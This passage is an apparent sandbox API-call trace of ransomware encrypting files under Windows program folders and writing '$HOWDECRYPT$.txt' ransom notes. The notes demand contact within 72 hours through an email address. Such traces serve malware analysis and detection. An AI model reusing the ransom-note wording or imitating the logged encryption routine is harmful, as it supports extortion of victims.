returned 1 [0092.989] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd00 | out: pbBuffer=0x57fd00) returned 1 [0092.990] GetProcessHeap () returned 0x2c0000 [0092.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.990] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcf8*=0x30) returned 1 [0092.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_item.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.990] GetProcessHeap () returned 0x2c0000 [0092.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.990] GetProcessHeap () returned 0x2c0000 [0092.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x358060 | out: hHeap=0x2c0000) returned 1 [0092.990] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fd00 | out: pbBuffer=0x57fd00) returned 1 [0092.990] GetProcessHeap () returned 0x2c0000 [0092.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.990] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcf8*=0x30) returned 1 [0092.990] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\pushplaysubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.990] GetProcessHeap () returned 0x2c0000 [0092.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.990] GetProcessHeap () returned 0x2c0000 [0092.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346648 | out: hHeap=0x2c0000) returned 1 [0092.991] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcf8 | out: pbBuffer=0x57fcf8) returned 1 [0092.991] GetProcessHeap () returned 0x2c0000 [0092.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.991] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcf0*=0x30) returned 1 [0092.991] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.991] GetProcessHeap () returned 0x2c0000 [0092.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.991] GetProcessHeap () returned 0x2c0000 [0092.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d8d8 | out: hHeap=0x2c0000) returned 1 [0092.991] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcf8 | out: pbBuffer=0x57fcf8) returned 1 [0092.991] GetProcessHeap () returned 0x2c0000 [0092.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.991] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcf0*=0x30) returned 1 [0092.991] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.991] GetProcessHeap () returned 0x2c0000 [0092.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.992] GetProcessHeap () returned 0x2c0000 [0092.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a260 | out: hHeap=0x2c0000) returned 1 [0092.992] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcf0 | out: pbBuffer=0x57fcf0) returned 1 [0092.992] GetProcessHeap () returned 0x2c0000 [0092.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.992] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fce8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fce8*=0x30) returned 1 [0092.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.992] GetProcessHeap () returned 0x2c0000 [0092.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.992] GetProcessHeap () returned 0x2c0000 [0092.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34ee78 | out: hHeap=0x2c0000) returned 1 [0092.992] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcf0 | out: pbBuffer=0x57fcf0) returned 1 [0092.992] GetProcessHeap () returned 0x2c0000 [0092.992] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.992] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fce8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fce8*=0x30) returned 1 [0092.992] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.993] GetProcessHeap () returned 0x2c0000 [0092.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.993] GetProcessHeap () returned 0x2c0000 [0092.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x381880 | out: hHeap=0x2c0000) returned 1 [0092.993] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fce8 | out: pbBuffer=0x57fce8) returned 1 [0092.993] GetProcessHeap () returned 0x2c0000 [0092.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.993] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fce0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fce0*=0x30) returned 1 [0092.993] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.993] GetProcessHeap () returned 0x2c0000 [0092.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.993] GetProcessHeap () returned 0x2c0000 [0092.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3553b0 | out: hHeap=0x2c0000) returned 1 [0092.993] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fce8 | out: pbBuffer=0x57fce8) returned 1 [0092.993] GetProcessHeap () returned 0x2c0000 [0092.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.993] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fce0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fce0*=0x30) returned 1 [0092.993] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.994] GetProcessHeap () returned 0x2c0000 [0092.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.994] GetProcessHeap () returned 0x2c0000 [0092.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35a160 | out: hHeap=0x2c0000) returned 1 [0092.994] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fce0 | out: pbBuffer=0x57fce0) returned 1 [0092.994] GetProcessHeap () returned 0x2c0000 [0092.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.994] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcd8*=0x30) returned 1 [0092.994] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.994] GetProcessHeap () returned 0x2c0000 [0092.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.994] GetProcessHeap () returned 0x2c0000 [0092.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3555a0 | out: hHeap=0x2c0000) returned 1 [0092.994] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fce0 | out: pbBuffer=0x57fce0) returned 1 [0092.994] GetProcessHeap () returned 0x2c0000 [0092.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.994] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcd8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcd8*=0x30) returned 1 [0092.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047_576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.995] GetProcessHeap () returned 0x2c0000 [0092.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.995] GetProcessHeap () returned 0x2c0000 [0092.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e7e8 | out: hHeap=0x2c0000) returned 1 [0092.995] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcd8 | out: pbBuffer=0x57fcd8) returned 1 [0092.995] GetProcessHeap () returned 0x2c0000 [0092.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.995] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcd0*=0x30) returned 1 [0092.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.995] GetProcessHeap () returned 0x2c0000 [0092.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.995] GetProcessHeap () returned 0x2c0000 [0092.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e200 | out: hHeap=0x2c0000) returned 1 [0092.995] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcd8 | out: pbBuffer=0x57fcd8) returned 1 [0092.995] GetProcessHeap () returned 0x2c0000 [0092.995] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.996] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcd0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcd0*=0x30) returned 1 [0092.996] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_VideoInset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.996] GetProcessHeap () returned 0x2c0000 [0092.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.996] GetProcessHeap () returned 0x2c0000 [0092.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e560 | out: hHeap=0x2c0000) returned 1 [0092.997] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcd0 | out: pbBuffer=0x57fcd0) returned 1 [0092.997] GetProcessHeap () returned 0x2c0000 [0092.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.997] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcc8*=0x30) returned 1 [0092.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.997] GetProcessHeap () returned 0x2c0000 [0092.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.997] GetProcessHeap () returned 0x2c0000 [0092.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x377e20 | out: hHeap=0x2c0000) returned 1 [0092.997] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcd0 | out: pbBuffer=0x57fcd0) returned 1 [0092.997] GetProcessHeap () returned 0x2c0000 [0092.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.997] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcc8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcc8*=0x30) returned 1 [0092.997] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Postage_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\postage_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.998] GetProcessHeap () returned 0x2c0000 [0092.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.998] GetProcessHeap () returned 0x2c0000 [0092.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346d48 | out: hHeap=0x2c0000) returned 1 [0092.998] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcc8 | out: pbBuffer=0x57fcc8) returned 1 [0092.998] GetProcessHeap () returned 0x2c0000 [0092.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.998] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcc0*=0x30) returned 1 [0092.998] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_videoinset.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_videoinset.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.998] GetProcessHeap () returned 0x2c0000 [0092.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.998] GetProcessHeap () returned 0x2c0000 [0092.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346728 | out: hHeap=0x2c0000) returned 1 [0092.998] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcc8 | out: pbBuffer=0x57fcc8) returned 1 [0092.998] GetProcessHeap () returned 0x2c0000 [0092.998] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.998] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcc0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcc0*=0x30) returned 1 [0092.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_selectionsubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.999] GetProcessHeap () returned 0x2c0000 [0092.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.999] GetProcessHeap () returned 0x2c0000 [0092.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34f238 | out: hHeap=0x2c0000) returned 1 [0092.999] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcc0 | out: pbBuffer=0x57fcc0) returned 1 [0092.999] GetProcessHeap () returned 0x2c0000 [0092.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0092.999] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57fcb8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57fcb8*=0x30) returned 1 [0092.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\photoedge_buttongraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\photoedge_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0092.999] GetProcessHeap () returned 0x2c0000 [0092.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0092.999] GetProcessHeap () returned 0x2c0000 [0092.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346b88 | out: hHeap=0x2c0000) returned 1 [0092.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0093.045] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0093.045] WriteFile (in: hFile=0x16c, lpBuffer=0x57fbf3*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fd1c, lpOverlapped=0x0 | out: lpBuffer=0x57fbf3*, lpNumberOfBytesWritten=0x57fd1c*=0x127, lpOverlapped=0x0) returned 1 [0093.046] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0093.046] WriteFile (in: hFile=0x16c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x57fd1c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x57fd1c*=0x2ac, lpOverlapped=0x0) returned 1 [0093.047] CloseHandle (hObject=0x16c) returned 1 [0093.047] GetProcessHeap () returned 0x2c0000 [0093.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37e3b0 | out: hHeap=0x2c0000) returned 1 [0093.047] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57fcb8 | out: pbBuffer=0x57fcb8) returned 1 [0093.047] GetProcessHeap () returned 0x2c0000 [0093.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0093.047] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x57fcb0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x57fcb0*=0x30) returned 1 [0093.047] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\ResizingPanels\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\resizingpanels\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.068] GetProcessHeap () returned 0x2c0000 [0093.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0093.068] GetProcessHeap () returned 0x2c0000 [0093.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37b228 | out: hHeap=0x2c0000) returned 1 [0093.068] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TRANSLAT\\FREN\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\translat\\fren\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0093.068] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0093.068] WriteFile (in: hFile=0x178, lpBuffer=0x57fbeb*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x57fd14, lpOverlapped=0x0 | out: lpBuffer=0x57fbeb*, lpNumberOfBytesWritten=0x57fd14*=0x127, lpOverlapped=0x0) returned 1 [0093.069] lstrlenA 